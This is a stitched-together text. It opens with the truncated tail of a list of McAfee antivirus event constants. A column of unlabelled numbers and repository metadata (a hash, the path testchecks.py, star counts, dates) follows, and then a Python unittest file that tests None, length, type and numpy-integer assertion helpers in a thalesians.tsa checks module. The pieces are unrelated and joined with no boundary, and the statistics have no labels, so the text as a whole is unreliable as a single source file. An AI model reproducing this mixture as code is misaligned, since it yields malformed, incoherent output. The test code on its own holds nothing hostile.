mcafee_EVENT_SCHED_TASK_CANCELED=mcafee_EVENT_SCHED_TASK_CANCELED, mcafee_EVENT_START_PROCESS=mcafee_EVENT_START_PROCESS, mcafee_TIME=mcafee_TIME, mcafee_EVENT_INFECTED_BINDARY=mcafee_EVENT_INFECTED_BINDARY, mcafee_EVENT_MAIL_VIRUSCLEANED=mcafee_EVENT_MAIL_VIRUSCLEANED, mcafee_SCANRETURNCODE=mcafee_SCANRETURNCODE, mcafee_LANGUAGECODE=mcafee_LANGUAGECODE, mcafee_DATVERSION=mcafee_DATVERSION, mcafee_EVENT_OAS_START=mcafee_EVENT_OAS_START, mcafee_EVENT_SERVICE_ENDING_1065=mcafee_EVENT_SERVICE_ENDING_1065, mcafee_EVENT_INFECTED_HEURISTICS=mcafee_EVENT_INFECTED_HEURISTICS, mcafee_EVENT_MAIL_VIRUS_NOTCLEANED=mcafee_EVENT_MAIL_VIRUS_NOTCLEANED, mcafee_EVENT_MAIL_CONTENTBLOCK=mcafee_EVENT_MAIL_CONTENTBLOCK, mcafee_EVENT_UPDATEFAILED=mcafee_EVENT_UPDATEFAILED, mcafee_EVENT_VIRUS_IN_BOOT_RECORD=mcafee_EVENT_VIRUS_IN_BOOT_RECORD, mcafee_EVENT_VIRUS_QUARANTINED=mcafee_EVENT_VIRUS_QUARANTINED, mcafee_NUMQUARANTINED=mcafee_NUMQUARANTINED, mcafee_EVENT_SCED_START_TASK_OK=mcafee_EVENT_SCED_START_TASK_OK, mcafee_EVENT_UPGRADE_RUNNING=mcafee_EVENT_UPGRADE_RUNNING, mcafee_EVENT_MAIL_LOWDISKLIMIT=mcafee_EVENT_MAIL_LOWDISKLIMIT, mcafee_VIRUSNAME=mcafee_VIRUSNAME, mcafee_EVENT_SCHED_TASK_STOP_ERROR=mcafee_EVENT_SCHED_TASK_STOP_ERROR, mcafee_EVENT_SCAN_SETTINGS=mcafee_EVENT_SCAN_SETTINGS, mcafee_EVENT_ODS_SCAN_ENDED=mcafee_EVENT_ODS_SCAN_ENDED, mcafee_FILENAME=mcafee_FILENAME, mcafee_MAILTONAME=mcafee_MAILTONAME, mcafee_NUMCLEANED=mcafee_NUMCLEANED, mcafee_PROCESSORSERIAL=mcafee_PROCESSORSERIAL, mcafee_EVENT_EPO_AGENT_WRONG_PLATFORM=mcafee_EVENT_EPO_AGENT_WRONG_PLATFORM, mcafee_NUMDELETED=mcafee_NUMDELETED, mcafee_EVENT_FILECLEANED=mcafee_EVENT_FILECLEANED, mcafee_EVENT_ALERTERROR=mcafee_EVENT_ALERTERROR, mcafee_EVENT_PROCESS_ENDED=mcafee_EVENT_PROCESS_ENDED, mcafee_EVENT_EPO_AGENT_RETRYLIMIT=mcafee_EVENT_EPO_AGENT_RETRYLIMIT, mcafee_EVENT_ALOG_ERROR=mcafee_EVENT_ALOG_ERROR, mcafee_EVENT_SCANEND_NO_VIRUSES=mcafee_EVENT_SCANEND_NO_VIRUSES, mcafee_USERNAME=mcafee_USERNAME, mcafee_EVENT_BOOT_SECTOR_CLEANED=mcafee_EVENT_BOOT_SECTOR_CLEANED, mcafee_OBRULE=mcafee_OBRULE, mcafee_EVENT_SCAN_FOUND_AND_CLEANED_INFECTIONS=mcafee_EVENT_SCAN_FOUND_AND_CLEANED_INFECTIONS, mcafee_EVENT_MAIL_VIRUS_DELETED=mcafee_EVENT_MAIL_VIRUS_DELETED, mcafee_EVENT_SCAN_FOUND_INFECTED_FILES=mcafee_EVENT_SCAN_FOUND_INFECTED_FILES, mcafee_VIRUSTYPE=mcafee_VIRUSTYPE, mcafee_EVENT_QUARANTINED_HEURISTICS=mcafee_EVENT_QUARANTINED_HEURISTICS, mcafee_EVENT_SCANNER_DISABLED=mcafee_EVENT_SCANNER_DISABLED, mcafee_EVENT_NOT_SCANNED_PASSWORD=mcafee_EVENT_NOT_SCANNED_PASSWORD)
| 906.220994
| 7,237
| 0.696237
| 18,894
| 164,026
| 5.819096
| 0.02043
| 0.170866
| 0.341513
| 0.00473
| 0.961699
| 0.949284
| 0.935932
| 0.898095
| 0.894794
| 0.891247
| 0
| 0.015062
| 0.061374
| 164,026
| 180
| 7,238
| 911.255556
| 0.699063
| 0.001878
| 0
| 0
| 0
| 0
| 0.608329
| 0.139498
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.017341
| 0.040462
| 0
| 0.040462
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
6c96848e154d88efce3017a206393380b3c02e16
| 68,699
|
py
|
Python
|
src/test/python/thalesians/tsa/testchecks.py
|
saarahrasheed/tsa
|
e4460f707eeecb737663c48d8fc3245f0acb124c
|
[
"Apache-2.0"
] | 117
|
2017-06-30T14:29:32.000Z
|
2022-02-10T00:54:35.000Z
|
src/test/python/thalesians/tsa/testchecks.py
|
saarahrasheed/tsa
|
e4460f707eeecb737663c48d8fc3245f0acb124c
|
[
"Apache-2.0"
] | 2
|
2017-09-01T11:42:14.000Z
|
2017-11-29T20:00:19.000Z
|
src/test/python/thalesians/tsa/testchecks.py
|
saarahrasheed/tsa
|
e4460f707eeecb737663c48d8fc3245f0acb124c
|
[
"Apache-2.0"
] | 37
|
2017-07-05T19:51:10.000Z
|
2021-04-27T00:11:18.000Z
|
import unittest
import thalesians.tsa.checks as checks
class TestConditions(unittest.TestCase):
def test_check(self):
checks.check(True is True)
checks.check(False is False)
checks.check(1 < 3)
checks.check(3 == 3)
checks.check(3 > 1)
with self.assertRaises(AssertionError):
checks.check(True is False)
with self.assertRaises(AssertionError):
checks.check(False is True)
with self.assertRaises(AssertionError):
checks.check(1 >= 3)
with self.assertRaises(AssertionError):
checks.check(3 != 3)
with self.assertRaises(AssertionError):
checks.check(3 <= 1)
def test_check_none(self):
checks.check_none(None)
with self.assertRaises(AssertionError):
checks.check_none(3)
def test_check_not_none(self):
checks.check_not_none(3)
with self.assertRaises(AssertionError):
checks.check_not_none(None)
def test_are_all_not_none(self):
self.assertTrue(checks.are_all_not_none(1, 2, 3))
self.assertFalse(checks.are_all_not_none(None, 2, 3))
self.assertFalse(checks.are_all_not_none(1, None, 3))
self.assertFalse(checks.are_all_not_none(1, 2, None))
self.assertFalse(checks.are_all_not_none(1, None, None))
self.assertFalse(checks.are_all_not_none(None, 2, None))
self.assertFalse(checks.are_all_not_none(None, None, 3))
self.assertTrue(checks.are_all_not_none(1, 2, 3, 'hi'))
self.assertFalse(checks.are_all_not_none(None, 2, 3, 'hi'))
self.assertFalse(checks.are_all_not_none(1, None, 3, 'hi'))
self.assertFalse(checks.are_all_not_none(1, 2, None, 'hi'))
self.assertFalse(checks.are_all_not_none(1, None, None, 'hi'))
self.assertFalse(checks.are_all_not_none(None, 2, None, 'hi'))
self.assertFalse(checks.are_all_not_none(None, None, 3, 'hi'))
self.assertFalse(checks.are_all_not_none(None, None, None))
self.assertFalse(checks.are_all_not_none(None))
def test_check_all_not_none(self):
checks.check_all_not_none(1, 2, 3)
with self.assertRaises(AssertionError):
checks.check_all_not_none(None, 2, 3)
with self.assertRaises(AssertionError):
checks.check_all_not_none(1, None, 3)
with self.assertRaises(AssertionError):
checks.check_all_not_none(1, 2, None)
with self.assertRaises(AssertionError):
checks.check_all_not_none(1, None, None)
with self.assertRaises(AssertionError):
checks.check_all_not_none(None, 2, None)
with self.assertRaises(AssertionError):
checks.check_all_not_none(None, None, 3)
checks.check_all_not_none(1, 2, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_not_none(None, 2, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_not_none(1, None, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_not_none(1, 2, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_not_none(1, None, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_not_none(None, 2, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_not_none(None, None, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_not_none(None, None, None)
with self.assertRaises(AssertionError):
checks.check_all_not_none(None)
def test_are_all_none(self):
self.assertFalse(checks.are_all_none(1, 2, 3))
self.assertFalse(checks.are_all_none(None, 2, 3))
self.assertFalse(checks.are_all_none(1, None, 3))
self.assertFalse(checks.are_all_none(1, 2, None))
self.assertFalse(checks.are_all_none(1, 2, 3))
self.assertFalse(checks.are_all_none(1, None, None))
self.assertFalse(checks.are_all_none(None, 2, None))
self.assertFalse(checks.are_all_none(None, None, 3))
self.assertFalse(checks.are_all_none(1, 2, 3, 'hi'))
self.assertFalse(checks.are_all_none(None, 2, 3, 'hi'))
self.assertFalse(checks.are_all_none(1, None, 3, 'hi'))
self.assertFalse(checks.are_all_none(1, 2, None, 'hi'))
self.assertFalse(checks.are_all_none(1, None, None, 'hi'))
self.assertFalse(checks.are_all_none(None, 2, None, 'hi'))
self.assertFalse(checks.are_all_none(None, None, 3, 'hi'))
self.assertTrue(checks.are_all_none(None, None, None))
self.assertTrue(checks.are_all_none(None))
def test_check_all_none(self):
with self.assertRaises(AssertionError):
checks.check_all_none(1, 2, 3)
with self.assertRaises(AssertionError):
checks.check_all_none(None, 2, 3)
with self.assertRaises(AssertionError):
checks.check_all_none(1, None, 3)
with self.assertRaises(AssertionError):
checks.check_all_none(1, 2, None)
with self.assertRaises(AssertionError):
checks.check_all_none(1, None, None)
with self.assertRaises(AssertionError):
checks.check_all_none(None, 2, None)
with self.assertRaises(AssertionError):
checks.check_all_none(None, None, 3)
with self.assertRaises(AssertionError):
checks.check_all_none(1, 2, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_none(None, 2, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_none(1, None, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_none(1, 2, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_none(1, None, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_none(None, 2, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_none(None, None, 3, 'hi')
checks.check_all_none(None, None, None)
checks.check_all_none(None)
def test_is_exactly_one_not_none(self):
self.assertFalse(checks.is_exactly_one_not_none(1, 2, 3))
self.assertFalse(checks.is_exactly_one_not_none(None, 2, 3))
self.assertFalse(checks.is_exactly_one_not_none(1, None, 3))
self.assertFalse(checks.is_exactly_one_not_none(1, 2, None))
self.assertTrue(checks.is_exactly_one_not_none(1, None, None))
self.assertTrue(checks.is_exactly_one_not_none(None, 2, None))
self.assertTrue(checks.is_exactly_one_not_none(None, None, 3))
self.assertFalse(checks.is_exactly_one_not_none(1, 2, 3, 'hi'))
self.assertFalse(checks.is_exactly_one_not_none(None, 2, 3, 'hi'))
self.assertFalse(checks.is_exactly_one_not_none(1, None, 3, 'hi'))
self.assertFalse(checks.is_exactly_one_not_none(1, 2, None, 'hi'))
self.assertFalse(checks.is_exactly_one_not_none(1, None, None, 'hi'))
self.assertFalse(checks.is_exactly_one_not_none(None, 2, None, 'hi'))
self.assertFalse(checks.is_exactly_one_not_none(None, None, 3, 'hi'))
self.assertFalse(checks.is_exactly_one_not_none(None, None, None))
self.assertFalse(checks.is_exactly_one_not_none(None))
def test_check_exactly_one_not_none(self):
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(1, 2, 3)
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(None, 2, 3)
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(1, None, 3)
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(1, 2, None)
checks.check_exactly_one_not_none(1, None, None)
checks.check_exactly_one_not_none(None, 2, None)
checks.check_exactly_one_not_none(None, None, 3)
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(1, 2, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(None, 2, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(1, None, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(1, 2, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(1, None, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(None, 2, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(None, None, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(None, None, None)
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(None)
def test_is_at_least_one_not_none(self):
self.assertTrue(checks.is_at_least_one_not_none(1, 2, 3))
self.assertTrue(checks.is_at_least_one_not_none(None, 2, 3))
self.assertTrue(checks.is_at_least_one_not_none(1, None, 3))
self.assertTrue(checks.is_at_least_one_not_none(1, 2, None))
self.assertTrue(checks.is_at_least_one_not_none(1, None, None))
self.assertTrue(checks.is_at_least_one_not_none(None, 2, None))
self.assertTrue(checks.is_at_least_one_not_none(None, None, 3))
self.assertTrue(checks.is_at_least_one_not_none(1, 2, 3, 'hi'))
self.assertTrue(checks.is_at_least_one_not_none(None, 2, 3, 'hi'))
self.assertTrue(checks.is_at_least_one_not_none(1, None, 3, 'hi'))
self.assertTrue(checks.is_at_least_one_not_none(1, 2, None, 'hi'))
self.assertTrue(checks.is_at_least_one_not_none(1, None, None, 'hi'))
self.assertTrue(checks.is_at_least_one_not_none(None, 2, None, 'hi'))
self.assertTrue(checks.is_at_least_one_not_none(None, None, 3, 'hi'))
self.assertFalse(checks.is_at_least_one_not_none(None, None, None))
self.assertFalse(checks.is_at_least_one_not_none(None))
def test_check_at_least_one_not_none(self):
checks.check_at_least_one_not_none(1, 2, 3)
checks.check_at_least_one_not_none(None, 2, 3)
checks.check_at_least_one_not_none(1, None, 3)
checks.check_at_least_one_not_none(1, 2, None)
checks.check_at_least_one_not_none(1, None, None)
checks.check_at_least_one_not_none(None, 2, None)
checks.check_at_least_one_not_none(None, None, 3)
checks.check_at_least_one_not_none(1, 2, 3, 'hi')
checks.check_at_least_one_not_none(None, 2, 3, 'hi')
checks.check_at_least_one_not_none(1, None, 3, 'hi')
checks.check_at_least_one_not_none(1, 2, None, 'hi')
checks.check_at_least_one_not_none(1, None, None, 'hi')
checks.check_at_least_one_not_none(None, 2, None, 'hi')
checks.check_at_least_one_not_none(None, None, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_at_least_one_not_none(None, None, None)
with self.assertRaises(AssertionError):
checks.check_at_least_one_not_none(None)
def test_is_at_most_one_not_none(self):
self.assertFalse(checks.is_at_most_one_not_none(1, 2, 3))
self.assertFalse(checks.is_at_most_one_not_none(None, 2, 3))
self.assertFalse(checks.is_at_most_one_not_none(1, None, 3))
self.assertFalse(checks.is_at_most_one_not_none(1, 2, None))
self.assertTrue(checks.is_at_most_one_not_none(1, None, None))
self.assertTrue(checks.is_at_most_one_not_none(None, 2, None))
self.assertTrue(checks.is_at_most_one_not_none(None, None, 3))
self.assertFalse(checks.is_at_most_one_not_none(1, 2, 3, 'hi'))
self.assertFalse(checks.is_at_most_one_not_none(None, 2, 3, 'hi'))
self.assertFalse(checks.is_at_most_one_not_none(1, None, 3, 'hi'))
self.assertFalse(checks.is_at_most_one_not_none(1, 2, None, 'hi'))
self.assertFalse(checks.is_at_most_one_not_none(1, None, None, 'hi'))
self.assertFalse(checks.is_at_most_one_not_none(None, 2, None, 'hi'))
self.assertFalse(checks.is_at_most_one_not_none(None, None, 3, 'hi'))
self.assertTrue(checks.is_at_most_one_not_none(None, None, None))
self.assertTrue(checks.is_at_most_one_not_none(None))
def test_check_at_most_one_not_none(self):
with self.assertRaises(AssertionError):
checks.check_at_most_one_not_none(1, 2, 3)
with self.assertRaises(AssertionError):
checks.check_at_most_one_not_none(None, 2, 3)
with self.assertRaises(AssertionError):
checks.check_at_most_one_not_none(1, None, 3)
with self.assertRaises(AssertionError):
checks.check_at_most_one_not_none(1, 2, None)
checks.check_at_most_one_not_none(1, None, None)
checks.check_at_most_one_not_none(None, 2, None)
checks.check_at_most_one_not_none(None, None, 3)
with self.assertRaises(AssertionError):
checks.check_at_most_one_not_none(1, 2, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_at_most_one_not_none(None, 2, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_at_most_one_not_none(1, None, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_at_most_one_not_none(1, 2, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_at_most_one_not_none(1, None, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_at_most_one_not_none(None, 2, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_at_most_one_not_none(None, None, 3, 'hi')
checks.check_at_most_one_not_none(None, None, None)
checks.check_at_most_one_not_none(None)
def test_is_same_len(self):
with self.assertRaises(TypeError):
# TypeError: object of type 'int' has no len()
checks.is_same_len(1, 'aaa')
self.assertTrue(checks.is_same_len([1], ['aaa']))
self.assertTrue(checks.is_same_len([1, 'b'], ['aaa', 222]))
self.assertTrue(checks.is_same_len([1, 'b', 3], ['aaa', 222, 'ccc']))
self.assertFalse(checks.is_same_len([], ['aaa']))
self.assertFalse(checks.is_same_len([1], ['aaa', 222]))
self.assertFalse(checks.is_same_len([1, 'b'], ['aaa']))
self.assertTrue(checks.is_same_len([1], ['aaa'], [111]))
self.assertTrue(checks.is_same_len([1, 'b'], ['aaa', 222], [111, 'BBB']))
self.assertTrue(checks.is_same_len([1, 'b', 3], ['aaa', 222, 'ccc'], [111, 'BBB', 333]))
self.assertFalse(checks.is_same_len([], ['aaa'], [111]))
self.assertFalse(checks.is_same_len([1], ['aaa', 222], [111, 'BBB']))
self.assertFalse(checks.is_same_len([1, 'b'], ['aaa'], [111, 'BBB']))
with self.assertRaises(TypeError):
# TypeError: object of type 'NoneType' has no len()
checks.is_same_len([1, 'b'], None)
with self.assertRaises(TypeError):
# TypeError: object of type 'NoneType' has no len()
checks.is_same_len(None, ['aaa'])
with self.assertRaises(TypeError):
# TypeError: object of type 'NoneType' has no len()
checks.is_same_len(None, None)
with self.assertRaises(TypeError):
# TypeError: object of type 'NoneType' has no len()
checks.is_same_len([1, 'b'], None, ['aaa', 222])
with self.assertRaises(TypeError):
# TypeError: object of type 'NoneType' has no len()
checks.is_same_len(None, ['aaa'], [111])
with self.assertRaises(TypeError):
# TypeError: object of type 'NoneType' has no len()
checks.is_same_len(None, None, [111, 'BBB'])
with self.assertRaises(TypeError):
# TypeError: object of type 'NoneType' has no len()
checks.is_same_len(None, None, None)
with self.assertRaises(TypeError):
# TypeError: object of type 'NoneType' has no len()
checks.is_same_len([1], None, ['aaa', 222])
with self.assertRaises(TypeError):
# TypeError: object of type 'NoneType' has no len()
checks.is_same_len(None, ['aaa'], [])
with self.assertRaises(TypeError):
# TypeError: object of type 'NoneType' has no len()
checks.is_same_len(None, ['aaa'], [111, 'BBB'])
def test_is_same_len_or_none(self):
with self.assertRaises(TypeError):
# TypeError: object of type 'int' has no len()
checks.is_same_len_or_none(1, 'aaa')
self.assertTrue(checks.is_same_len_or_none([1], ['aaa']))
self.assertTrue(checks.is_same_len_or_none([1, 'b'], ['aaa', 222]))
self.assertTrue(checks.is_same_len_or_none([1, 'b', 3], ['aaa', 222, 'ccc']))
self.assertFalse(checks.is_same_len_or_none([], ['aaa']))
self.assertFalse(checks.is_same_len_or_none([1], ['aaa', 222]))
self.assertFalse(checks.is_same_len_or_none([1, 'b'], ['aaa']))
self.assertTrue(checks.is_same_len_or_none([1], ['aaa'], [111]))
self.assertTrue(checks.is_same_len_or_none([1, 'b'], ['aaa', 222], [111, 'BBB']))
self.assertTrue(checks.is_same_len_or_none([1, 'b', 3], ['aaa', 222, 'ccc'], [111, 'BBB', 333]))
self.assertFalse(checks.is_same_len_or_none([], ['aaa'], [111]))
self.assertFalse(checks.is_same_len_or_none([1], ['aaa', 222], [111, 'BBB']))
self.assertFalse(checks.is_same_len_or_none([1, 'b'], ['aaa'], [111, 'BBB']))
self.assertTrue(checks.is_same_len_or_none([1, 'b'], None))
self.assertTrue(checks.is_same_len_or_none(None, ['aaa']))
self.assertTrue(checks.is_same_len_or_none(None, None))
self.assertTrue(checks.is_same_len_or_none([1, 'b'], None, ['aaa', 222]))
self.assertTrue(checks.is_same_len_or_none(None, ['aaa'], [111]))
self.assertTrue(checks.is_same_len_or_none(None, None, [111, 'BBB']))
self.assertTrue(checks.is_same_len_or_none(None, None, None))
self.assertFalse(checks.is_same_len_or_none([1], None, ['aaa', 222]))
self.assertFalse(checks.is_same_len_or_none(None, ['aaa'], []))
self.assertFalse(checks.is_same_len_or_none(None, ['aaa'], [111, 'BBB']))
def test_is_same_len_or_all_none(self):
with self.assertRaises(TypeError):
# TypeError: object of type 'int' has no len()
checks.is_same_len_or_all_none(1, 'aaa')
self.assertTrue(checks.is_same_len_or_all_none([1], ['aaa']))
self.assertTrue(checks.is_same_len_or_all_none([1, 'b'], ['aaa', 222]))
self.assertTrue(checks.is_same_len_or_all_none([1, 'b', 3], ['aaa', 222, 'ccc']))
self.assertFalse(checks.is_same_len_or_all_none([], ['aaa']))
self.assertFalse(checks.is_same_len_or_all_none([1], ['aaa', 222]))
self.assertFalse(checks.is_same_len_or_all_none([1, 'b'], ['aaa']))
self.assertTrue(checks.is_same_len_or_all_none([1], ['aaa'], [111]))
self.assertTrue(checks.is_same_len_or_all_none([1, 'b'], ['aaa', 222], [111, 'BBB']))
self.assertTrue(checks.is_same_len_or_all_none([1, 'b', 3], ['aaa', 222, 'ccc'], [111, 'BBB', 333]))
self.assertFalse(checks.is_same_len_or_all_none([], ['aaa'], [111]))
self.assertFalse(checks.is_same_len_or_all_none([1], ['aaa', 222], [111, 'BBB']))
self.assertFalse(checks.is_same_len_or_all_none([1, 'b'], ['aaa'], [111, 'BBB']))
self.assertFalse(checks.is_same_len_or_all_none([1, 'b'], None))
self.assertFalse(checks.is_same_len_or_all_none(None, ['aaa']))
self.assertTrue(checks.is_same_len_or_all_none(None, None))
self.assertFalse(checks.is_same_len_or_all_none([1, 'b'], None, ['aaa', 222]))
self.assertFalse(checks.is_same_len_or_all_none(None, ['aaa'], [111]))
self.assertFalse(checks.is_same_len_or_all_none(None, None, [111, 'BBB']))
self.assertTrue(checks.is_same_len_or_all_none(None, None, None))
self.assertFalse(checks.is_same_len_or_all_none([1], None, ['aaa', 222]))
self.assertFalse(checks.is_same_len_or_all_none(None, ['aaa'], []))
self.assertFalse(checks.is_same_len_or_all_none(None, ['aaa'], [111, 'BBB']))
def test_is_instance(self):
self.assertTrue(checks.is_instance(1, int))
self.assertTrue(checks.is_instance(3.5, float))
self.assertTrue(checks.is_instance('hello', str))
self.assertTrue(checks.is_instance([1, 2, 3], list))
self.assertTrue(checks.is_instance(1, (int, float)))
self.assertTrue(checks.is_instance(3.5, (int, float)))
self.assertTrue(checks.is_instance('hello', (str, list)))
self.assertTrue(checks.is_instance([1, 2, 3], (str, list)))
self.assertFalse(checks.is_instance(1, float))
self.assertFalse(checks.is_instance(3.5, int))
self.assertFalse(checks.is_instance('hello', list))
self.assertFalse(checks.is_instance([1, 2, 3], str))
self.assertFalse(checks.is_instance(1, (list, str)))
self.assertFalse(checks.is_instance(3.5, (list, str)))
self.assertFalse(checks.is_instance('hello', (int, float)))
self.assertFalse(checks.is_instance([1, 2, 3], (int, float)))
self.assertFalse(checks.is_instance(None, int))
self.assertFalse(checks.is_instance(None, float))
self.assertFalse(checks.is_instance(None, str))
self.assertFalse(checks.is_instance(None, list))
self.assertFalse(checks.is_instance(None, (int, float)))
self.assertFalse(checks.is_instance(None, (int, float)))
self.assertFalse(checks.is_instance(None, (str, list)))
self.assertFalse(checks.is_instance(None, (str, list)))
self.assertTrue(checks.is_instance(1, int, allow_none=True))
self.assertTrue(checks.is_instance(3.5, float, allow_none=True))
self.assertTrue(checks.is_instance('hello', str, allow_none=True))
self.assertTrue(checks.is_instance([1, 2, 3], list, allow_none=True))
self.assertTrue(checks.is_instance(1, (int, float), allow_none=True))
self.assertTrue(checks.is_instance(3.5, (int, float), allow_none=True))
self.assertTrue(checks.is_instance('hello', (str, list), allow_none=True))
self.assertTrue(checks.is_instance([1, 2, 3], (str, list), allow_none=True))
self.assertFalse(checks.is_instance(1, float, allow_none=True))
self.assertFalse(checks.is_instance(3.5, int, allow_none=True))
self.assertFalse(checks.is_instance('hello', list, allow_none=True))
self.assertFalse(checks.is_instance([1, 2, 3], str, allow_none=True))
self.assertFalse(checks.is_instance(1, (list, str), allow_none=True))
self.assertFalse(checks.is_instance(3.5, (list, str), allow_none=True))
self.assertFalse(checks.is_instance('hello', (int, float), allow_none=True))
self.assertFalse(checks.is_instance([1, 2, 3], (int, float), allow_none=True))
self.assertTrue(checks.is_instance(None, int, allow_none=True))
self.assertTrue(checks.is_instance(None, float, allow_none=True))
self.assertTrue(checks.is_instance(None, str, allow_none=True))
self.assertTrue(checks.is_instance(None, list, allow_none=True))
self.assertTrue(checks.is_instance(None, (int, float), allow_none=True))
self.assertTrue(checks.is_instance(None, (int, float), allow_none=True))
self.assertTrue(checks.is_instance(None, (str, list), allow_none=True))
self.assertTrue(checks.is_instance(None, (str, list), allow_none=True))
def test_check_instance(self):
checks.check_instance(1, int)
checks.check_instance(3.5, float)
checks.check_instance('hello', str)
checks.check_instance([1, 2, 3], list)
checks.check_instance(1, (int, float))
checks.check_instance(3.5, (int, float))
checks.check_instance('hello', (str, list))
checks.check_instance([1, 2, 3], (str, list))
with self.assertRaises(AssertionError):
checks.check_instance(1, float)
with self.assertRaises(AssertionError):
checks.check_instance(3.5, int)
with self.assertRaises(AssertionError):
checks.check_instance('hello', list)
with self.assertRaises(AssertionError):
checks.check_instance([1, 2, 3], str)
with self.assertRaises(AssertionError):
checks.check_instance(1, (list, str))
with self.assertRaises(AssertionError):
checks.check_instance(3.5, (list, str))
with self.assertRaises(AssertionError):
checks.check_instance('hello', (int, float))
with self.assertRaises(AssertionError):
checks.check_instance([1, 2, 3], (int, float))
with self.assertRaises(AssertionError):
checks.check_instance(None, int)
with self.assertRaises(AssertionError):
checks.check_instance(None, float)
with self.assertRaises(AssertionError):
checks.check_instance(None, str)
with self.assertRaises(AssertionError):
checks.check_instance(None, list)
with self.assertRaises(AssertionError):
checks.check_instance(None, (int, float))
with self.assertRaises(AssertionError):
checks.check_instance(None, (str, list))
checks.check_instance(1, int, allow_none=True)
checks.check_instance(3.5, float, allow_none=True)
checks.check_instance('hello', str, allow_none=True)
checks.check_instance([1, 2, 3], list, allow_none=True)
checks.check_instance(1, (int, float), allow_none=True)
checks.check_instance(3.5, (int, float), allow_none=True)
checks.check_instance('hello', (str, list), allow_none=True)
checks.check_instance([1, 2, 3], (str, list), allow_none=True)
with self.assertRaises(AssertionError):
checks.check_instance(1, float, allow_none=True)
with self.assertRaises(AssertionError):
checks.check_instance(3.5, int, allow_none=True)
with self.assertRaises(AssertionError):
checks.check_instance('hello', list, allow_none=True)
with self.assertRaises(AssertionError):
checks.check_instance([1, 2, 3], str, allow_none=True)
with self.assertRaises(AssertionError):
checks.check_instance(1, (list, str), allow_none=True)
with self.assertRaises(AssertionError):
checks.check_instance(3.5, (list, str), allow_none=True)
with self.assertRaises(AssertionError):
checks.check_instance('hello', (int, float), allow_none=True)
with self.assertRaises(AssertionError):
checks.check_instance([1, 2, 3], (int, float), allow_none=True)
checks.check_instance(None, int, allow_none=True)
checks.check_instance(None, float, allow_none=True)
checks.check_instance(None, str, allow_none=True)
checks.check_instance(None, list, allow_none=True)
checks.check_instance(None, (int, float), allow_none=True)
checks.check_instance(None, (int, float), allow_none=True)
checks.check_instance(None, (str, list), allow_none=True)
checks.check_instance(None, (str, list), allow_none=True)
def test_ints(self):
import numpy as np
self.assertTrue(checks.is_int(3))
self.assertFalse(checks.is_int(3.5))
self.assertFalse(checks.is_int(np.int64(3)))
self.assertFalse(checks.is_int(None))
self.assertTrue(checks.is_int(None, allow_none=True))
self.assertFalse(checks.is_int('hi'))
checks.check_int(3)
with self.assertRaises(AssertionError):
checks.check_int(3.5)
with self.assertRaises(AssertionError):
checks.check_int(np.int64(3))
with self.assertRaises(AssertionError):
checks.check_int(None)
checks.check_int(None, allow_none=True)
with self.assertRaises(AssertionError):
checks.check_int('hi')
self.assertFalse(checks.is_some_numpy_int(3))
self.assertFalse(checks.is_some_numpy_int(3.5))
self.assertTrue(checks.is_some_numpy_int(np.int64(3)))
self.assertFalse(checks.is_some_numpy_int(None))
self.assertTrue(checks.is_some_numpy_int(None, allow_none=True))
self.assertFalse(checks.is_some_numpy_int('hi'))
with self.assertRaises(AssertionError):
checks.check_some_numpy_int(3)
with self.assertRaises(AssertionError):
checks.check_some_numpy_int(3.5)
checks.check_some_numpy_int(np.int64(3))
with self.assertRaises(AssertionError):
checks.check_some_numpy_int(None)
checks.check_some_numpy_int(None, allow_none=True)
with self.assertRaises(AssertionError):
checks.check_some_numpy_int('hi')
self.assertFalse(checks.is_some_numpy_uint(3))
self.assertFalse(checks.is_some_numpy_uint(3.5))
self.assertTrue(checks.is_some_numpy_uint(np.uint64(3)))
self.assertFalse(checks.is_some_numpy_uint(None))
self.assertTrue(checks.is_some_numpy_uint(None, allow_none=True))
self.assertFalse(checks.is_some_numpy_uint('hi'))
with self.assertRaises(AssertionError):
checks.check_some_numpy_uint(3)
with self.assertRaises(AssertionError):
checks.check_some_numpy_uint(3.5)
checks.check_some_numpy_uint(np.uint64(3))
with self.assertRaises(AssertionError):
checks.check_some_numpy_uint(None)
checks.check_some_numpy_uint(None, allow_none=True)
with self.assertRaises(AssertionError):
checks.check_some_numpy_uint('hi')
